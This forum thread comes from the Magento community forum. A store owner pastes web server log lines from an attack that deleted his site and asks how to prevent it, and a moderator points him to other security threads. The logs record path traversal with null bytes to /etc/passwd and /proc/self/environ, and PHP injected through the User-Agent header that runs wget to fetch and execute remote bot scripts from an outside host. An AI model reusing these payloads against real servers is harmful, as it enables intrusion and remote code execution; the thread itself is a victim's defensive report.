Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

succesfull 0 byte code attack
 
fitguy
Jr. Member
 
Total Posts:  2
Joined:  2010-12-18
 

last night somebody tried succesfully to inject 0 bytecode and managed to delete the whole website root folder.
how is this possible?

version 1.3.2.1

any thoughts? How can i prevent this in the future?

[18/Dec/2010:04:59:36 +0100] "GET /foldername/customer/index.php?option=com_product&controller;=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd�00 HTTP/1.1" 200 8465 "-" "libwww-perl/5.805"
 
[18/Dec/2010:04:59:38 +0100] "GET /foldername/customer/index.php?option=com_product&controller;=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ&#x00;00 HTTP/1.1" 200 1532 "-" "jcfs<?system(\"hostname 2> /dev/stdout\"); ?>jcfs"
[18/Dec/2010:04:59:41 +0100] "GET /foldername/customer/index.php?option=com_product&controller;=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ&#x00;00 HTTP/1.1" 200 488 "-" "jcfs<? include('http://yeshouse.net/my/.injek/new/phpbot.txt??'); ?>jcfs"
 
[18/Dec/2010:04:59:43 +0100] "GET /foldername/customer/index.php?option=com_product&controller;=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ&#x00;00 HTTP/1.1" 200 1533 "-" "jcfs<?system(\"wget http://www.yeshouse.net/my/.injek/empix.txt -O emp.php;chmod 755 emp.php;cd /tmp;wget http://www.yeshouse.net/my/.injek/encuk.txt -O ips;cd /tmp;wget http://www.yeshouse.net/my/.injek/new/hanyar.txt;lwp-download http://www.yeshouse.net/my/.injek/new/hanyar.txt;perl hanyar.txt;rm -rf hanyar.txt;rm -rf hanyar.txt.* 2> /dev/stdout\"); ?>jcfs"
[18/Dec/2010:04:59:43 +0100] "GET /foldername/customer/index.php?option=com_product&controller;=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ&#x00;00 HTTP/1.1" 200 1542 "-" "libwww-perl/5.805"
 
[18/Dec/2010:04:59:44 +0100] "GET /foldername/customer/index.php?option=com_product&controller;=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ&#x00;00 HTTP/1.1" 200 1556 "-" "jcfs<?system(\"hostname 2> /dev/stdout\"); ?>jcfs"
 
[18/Dec/2010:04:59:48 +0100] "GET /foldername/customer/index.php?option=com_product&controller;=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ&#x00;00 HTTP/1.1" 200 488 "-" "jcfs<? include('http://yeshouse.net/my/.injek/new/phpbot.txt??'); ?>jcfs"
[18/Dec/2010:04:59:49 +0100] "GET /foldername/customer/index.php?option=com_product&controller;=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ&#x00;00 HTTP/1.1" 200 1532 "-" "jcfs<?system(\"wget http://www.yeshouse.net/my/.injek/empix.txt -O emp.php;chmod 755 emp.php;cd /tmp;wget http://www.yeshouse.net/my/.injek/encuk.txt -O ips;cd /tmp;wget http://www.yeshouse.net/my/.injek/new/hanyar.txt;lwp-download http://www.yeshouse.net/my/.injek/new/hanyar.txt;perl hanyar.txt;rm -rf hanyar.txt;rm -rf hanyar.txt.* 2> /dev/stdout\"); ?>jcfs"
 
Magento Community Magento Community
Magento Community
Magento Community
 
J_T_
Moderator
 
Avatar
Total Posts:  1961
Joined:  2008-08-07
London-ish, UK
 

Scroll down the Security forum threads and read my threads on this topic. With code proposals and some unfinished htaccess rules.

 
Magento Community Magento Community
Magento Community
Magento Community
 
fitguy
Jr. Member
 
Total Posts:  2
Joined:  2010-12-18
 

Thx JT for the tip!

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top